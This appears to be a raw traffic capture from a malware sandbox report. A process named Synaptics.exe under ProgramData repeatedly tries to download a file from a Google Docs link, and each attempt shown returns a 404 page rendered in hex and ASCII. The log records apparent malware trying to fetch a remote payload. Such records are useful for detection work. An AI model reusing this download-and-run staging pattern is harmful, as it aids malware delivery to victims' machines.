                                                                                                                                                                                        2022-05-17 11:32:07 UTC886INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 55 76 4b 69 69 6e 56 44 76 32 61 4f 64 6b 58 6a 2f 75 2f 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bUvKiinVDv2aOdkXj/u/8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:07 UTC887INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:07 UTC888INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        292192.168.2.350080142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC884OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC888INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fD9ebm00IehM/Gi2NIl9hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC889INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC889INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 79 62 59 62 34 59 69 69 34 4c 57 53 6b 4c 62 49 53 35 4f 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QybYb4Yii4LWSkLbIS5OQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC890INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC891INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        293192.168.2.350081142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC888OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC891INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IRVHXWyRbwHMHmmg+CNNXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC892INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 30 41 41 2f 58 46 33 4d 55 35 6f 64 70 74 34 51 51 39 75 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g0AA/XF3MU5odpt4QQ9uaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:08 UTC894INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:08 UTC894INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        294192.168.2.350082142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC891OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC894INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ev4tjjODezkm1A/chIyJag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC895INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 72 47 55 47 6c 43 56 45 76 54 53 47 73 4a 64 49 56 50 30 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/rGUGlCVEvTSGsJdIVP0Ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:08 UTC897INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:08 UTC897INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        295192.168.2.350084142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC894OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC897INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0nwInk+c14+vVNRMzNqnzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC899INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 6f 2b 37 58 6a 38 34 74 53 67 61 51 5a 4f 36 4d 48 75 51 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vo+7Xj84tSgaQZO6MHuQrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:08 UTC900INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:08 UTC900INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        296192.168.2.350085142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:08 UTC897OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:08 UTC900INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:08 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NqjkWRVe00j1bdHEavgyZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:08 UTC902INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:08 UTC902INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2b 58 37 33 31 2f 47 6a 67 6d 42 50 66 2f 42 4a 31 37 64 37 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+X731/GjgmBPf/BJ17d7cA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
